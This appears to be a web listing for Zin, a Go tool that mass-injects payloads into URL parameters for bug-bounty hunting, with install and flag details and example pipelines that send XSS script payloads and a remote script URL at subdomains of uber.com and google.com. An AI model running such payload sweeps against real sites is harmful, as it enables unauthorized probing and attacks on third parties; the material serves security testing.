Zin is a payload Injector For Bugbounties Written In Go.
Features
Install
$ go get -u github.com/ethicalhackingplayground/Zin
New Features
Arguments
May the bounties come
-c int
the concurrency (default 20)
-g string
grep the response for any matches
-p string
the payload to be used
-pL string
the list of payloads to be used
-s int
filter by status codes (default 200)
$ subfinder uber.com | gau | grep “=http” | Zin -c 80 -p http://10.82.214.84:31386/foobar.js -g “SUP3R_S3cret_1337_K3y”
$ subfinder uber.com | gau| Zin -c 80 -p ‘”><script>alert(matchforthis)script>’ -g “matchforthis”
$ cat hosts | gau | grep “&” | Zin -c 80 -pL <payloadfile>
$ subfinder -dL domains –silent | gau | Zin -c 80 -p <payload>
$ echo “google.com” | gau | grep “&” | Zin -c 80 -p ‘”><script>alert(matchthis)</script<“‘ -g “matchthis”
$ cat hosts | gau | Zin -c 80 -p <payload>
General Working of a Web Application Firewall (WAF) A Web Application Firewall (WAF) acts as…
How to Send POST Requests Using curl in Linux If you work with APIs, servers,…
If you are a Linux user, you have probably seen commands like chmod 777 while…
Vim and Vi are among the most powerful text editors in the Linux world. They…
Working with compressed files is a common task for any Linux user. Whether you are…
In the digital era, an email address can reveal much more than just a contact…